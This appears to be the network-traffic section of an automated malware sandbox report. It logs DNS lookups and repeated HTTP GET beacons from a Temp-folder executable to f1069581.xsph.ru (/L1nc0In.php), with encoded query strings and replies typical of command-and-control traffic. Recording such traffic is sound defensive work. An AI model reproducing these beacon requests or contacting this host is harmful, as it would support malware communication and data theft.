Jan 2, 2025 05:17:05.214426994 CET	53	51241	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 2, 2025 05:17:05.174551964 CET	192.168.2.5	1.1.1.1	0x5486	Standard query (0)	f1069581.xsph.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 2, 2025 05:17:05.214426994 CET	1.1.1.1	192.168.2.5	0x5486	No error (0)	f1069581.xsph.ru		141.8.192.151	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

f1069581.xsph.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:17:05.239795923 CET	556	OUT	GET /L1nc0In.php?Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o&75bc118bb61e898f749f2e2d30ba883f=b10b73b68010ec981337a8b11094b01e&0ba6e725790744febcc21ebe8d80c3a7=ANwYTMjFGO0gTM0M2Y2YGM3Q2N3ITNzAzNwMjYwYTNiNGMyUzY2gjY&Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o HTTP/1.1 Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru Connection: Keep-Alive
Jan 2, 2025 05:17:06.085664988 CET	1236	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:17:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2152 Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 4a 69 5a 30 49 54 4e 78 6b 54 5a 7a 4d 54 5a 6c 4a 47 5a 79 59 47 4f 34 63 6a 5a 33 55 47 5a 79 63 7a 4e 78 45 6d 59 30 63 6a 4d 6b 4a 69 4f 69 45 57 4e 7a 51 54 4d 7a 59 44 4e 6d 6c 44 5a 34 6b 54 4f 32 49 7a 4d 6a 46 6d 4d 7a 67 7a 4d 30 67 54 5a 35 49 57 5a 35 4d 47 4d 69 77 69 49 6d 46 31 62 33 39 55 61 4b 6c 6e 57 59 4a 56 65 61 68 6c 57 31 4a 47 4d 4f 56 54 57 79 55 44 62 6a 35 6d 53 78 6b 56 4d 35 55 58 59 58 52 57 4d 69 68 6b 51 32 70 31 56 6a 6c 57 53 44 46 30 53 4d 4e 55 53 72 6c 6b 61 76 6c 32 54 46 70 56 56 57 5a 56 4f 7a 4a 6d 4d 4b 52 58 5a 57 35 55 4e 5a 4a 54 4e 73 4e 6d 62 4b 46 54 57 78 6b 54 64 68 64 46 5a 78 49 47 53 43 5a 6e 57 58 4e 57 61 4a 4e 55 51 4c 78 30 51 4a 74 57 53 71 39 57 61 69 64 55 4f 70 4a 47 57 73 52 56 5a 58 35 55 64 61 68 6c 53 35 52 32 56 4f 5a 6d 59 74 78 6d 62 6b 64 46 65 33 4a 6d 4d 57 35 57 53 70 46 30 5a 44 6c 32 64 70 4a 6c 52 4f 5a 56 53 71 39 57 61 61 64 6c 55 32 46 31 4d 73 70 6d 59 74 5a 56 65 6a 35 6d 56 71 68 6c 4d 31 41 6e 57 7a 59 31 63 6a 64 [TRUNCATED] Data Ascii: 9JiZ0ITNxkTZzMTZlJGZyYGO4cjZ3UGZyczNxEmY0cjMkJiOiEWNzQTMzYDNmlDZ4kTO2IzMjFmMzgzM0gTZ5IWZ5MGMiwiImF1b39UaKlnWYJVeahlW1JGMOVTWyUDbj5mSxkVM5UXYXRWMihkQ2p1VjlWSDF0SMNUSrlkavl2TFpVVWZVOzJmMKRXZW5UNZJTNsNmbKFTWxkTdhdFZxIGSCZnWXNWaJNUQLx0QJtWSq9WaidUOpJGWsRVZX5UdahlS5R2VOZmYtxmbkdFe3JmMW5WSpF0ZDl2dpJlROZVSq9WaadlU2F1MspmYtZVej5mVqhlM1AnWzY1cjdUOspVeJdWSB92cJ1Gd5JWMsZGZyY1TMFDeollMslnWXFjQJp2bpp1V1YXZtZFdhhlUmJWbs5GZXh3diJjVulUaBd2QpdXaNRUSp9UaKpHZXx2aZZlS1klMGlHZX5kaRdVN2FGWShWWykzcYJTNwp1MWN3YHlDbalXSnlUQvNXSqdmMNRUQ15ERjRXSq9WaadlUxQ2Rs5mYtlzcYJTNwp1MWN3YHlDbalXSnlUQvNXSq1UeNR1Y11ERRl2TppEbahkVwEGWShmYGlTdhdFZxIGSCZnWXNWaJNUQLx0QKhWWywWeadVMCl0RoBzYtlzTJp2bpp1VxgGVuJVdadVNwR2R1YXWxkTdhdFZxIGSCZnWXNWaJNUQLx0QKJEVplkNJ1mVrJGMOBjYtZVdhhlU1JmMOZmYtxmbkdFe3JmMW5WSpF0ZDlGesNmM4hmWq9WaahlUoNGbSJkVuZFbYJTNwp1MWN3YHlDbalXSnlUQvNXTE9WaWVlV1FmV5UXYXRWMihkQ2p1VjlWSDF0SMNkS6pFWShGZG10ZadkVwE2V1YVSq9WaadVMoRlbslHZHVTMiJjTmJWbs5GZXh3diJjVulUaBd2QpdXaVFTVp9UaKxmWHlDRlhlSwImbWZXWxkTdhdFZxIGSCZnWXNWaJNUQLx0QJhXTEVVaPlmS [TRUNCATED]
Jan 2, 2025 05:17:06.085701942 CET	224	IN	Data Raw: 70 6c 6b 4e 4a 31 6d 56 72 4a 47 4d 4f 68 6d 57 59 70 45 61 59 4a 54 4e 77 70 31 4d 57 4e 33 59 48 6c 44 62 61 6c 58 53 6e 6c 55 51 76 4e 58 53 74 52 58 65 69 46 7a 61 6e 52 6d 4d 57 39 55 53 71 39 57 61 61 64 56 4d 6f 52 56 62 31 59 58 59 58 52 Data Ascii: plkNJ1mVrJGMOhmWYpEaYJTNwp1MWN3YHlDbalXSnlUQvNXStRXeiFzanRmMW9USq9WaadVMoRVb1YXYXRGbjxWO1F2VkFjYIJkdad1Ypl0QBtETDpkWUlWS2kUbWtmYw4UdiJDbupFWKZmYtxmbkdFe3JmMW5WSpF0ZDl2dpF2MKZ3VTJ0MaVFNp9UaKVnYywmbahlSmJWbs5GZXh3diJjVulUaBd2Q
Jan 2, 2025 05:17:06.085712910 CET	224	IN	Data Raw: 70 6c 6b 4e 4a 31 6d 56 72 4a 47 4d 4f 68 6d 57 59 70 45 61 59 4a 54 4e 77 70 31 4d 57 4e 33 59 48 6c 44 62 61 6c 58 53 6e 6c 55 51 76 4e 58 53 74 52 58 65 69 46 7a 61 6e 52 6d 4d 57 39 55 53 71 39 57 61 61 64 56 4d 6f 52 56 62 31 59 58 59 58 52 Data Ascii: plkNJ1mVrJGMOhmWYpEaYJTNwp1MWN3YHlDbalXSnlUQvNXStRXeiFzanRmMW9USq9WaadVMoRVb1YXYXRGbjxWO1F2VkFjYIJkdad1Ypl0QBtETDpkWUlWS2kUbWtmYw4UdiJDbupFWKZmYtxmbkdFe3JmMW5WSpF0ZDl2dpF2MKZ3VTJ0MaVFNp9UaKVnYywmbahlSmJWbs5GZXh3diJjVulUaBd2Q
Jan 2, 2025 05:17:06.171778917 CET	876	IN	Data Raw: 70 64 58 61 68 4e 6a 53 32 64 31 55 43 4e 6a 57 56 52 54 61 50 6c 6d 53 31 51 32 52 73 70 47 57 79 55 44 63 61 4e 6a 56 7a 4e 32 52 35 77 6d 57 35 6c 30 5a 4a 46 30 62 7a 6c 55 61 30 73 53 57 54 6c 7a 59 51 64 55 4d 32 6c 56 65 31 73 6d 59 74 78 Data Ascii: pdXahNjS2d1UCNjWVRTaPlmS1Q2RspGWyUDcaNjVzN2R5wmW5l0ZJF0bzlUa0sSWTlzYQdUM2lVe1smYtxGdldkR0xkbkNDZ5lzYMFzd2M2MCBDZHd2KKJTM2lVe1smYtxGdldkR0xkbkNDZ5lzYMFzd2M2MCBDZHdmbQdlWsNWbndWWUd3ZidVO5pVaCxmYHpEaidEboRWbFdGTHJVdhVVM0kVVwcWZXl0ZadkVwk1VWlXW5JE
Jan 2, 2025 05:17:06.470499039 CET	2229	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNl [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru
Jan 2, 2025 05:17:06.688663960 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:17:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:17:06.477078915 CET	827	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIlhDZlVTYlRDOyUzMmZWM2QGOzMGOzATN4cDN4MjMiNzY2UGMzUGOxIiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1 Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru
Jan 2, 2025 05:17:07.152820110 CET	158	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:17:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jan 2, 2025 05:17:07.158274889 CET	1428	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&154d77d402106dff3d2a63610a8c9212=d1nIw4WSzh3RSZnUuJGcS5mY2p1RkVnVtJmdChlY25URYNmQYJGbSZEWjh3VZpWOHR1Y4ZVWwY0RSdnQYF1Y4FzY1lTbaNnRHh1YO52Ys5EWWNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIlhDZlVTYlRDOyUzMmZWM2QGO [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru
Jan 2, 2025 05:17:07.370100021 CET	158	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:17:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:17:11.700022936 CET	2233	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru
Jan 2, 2025 05:17:12.373090982 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:17:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49724	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:17:17.388451099 CET	2257	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru Connection: Keep-Alive
Jan 2, 2025 05:17:18.150692940 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:17:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49757	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:17:23.168836117 CET	2233	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru
Jan 2, 2025 05:17:23.844237089 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:17:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49798	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:17:28.857894897 CET	2257	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru Connection: Keep-Alive
Jan 2, 2025 05:17:29.604166031 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:17:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

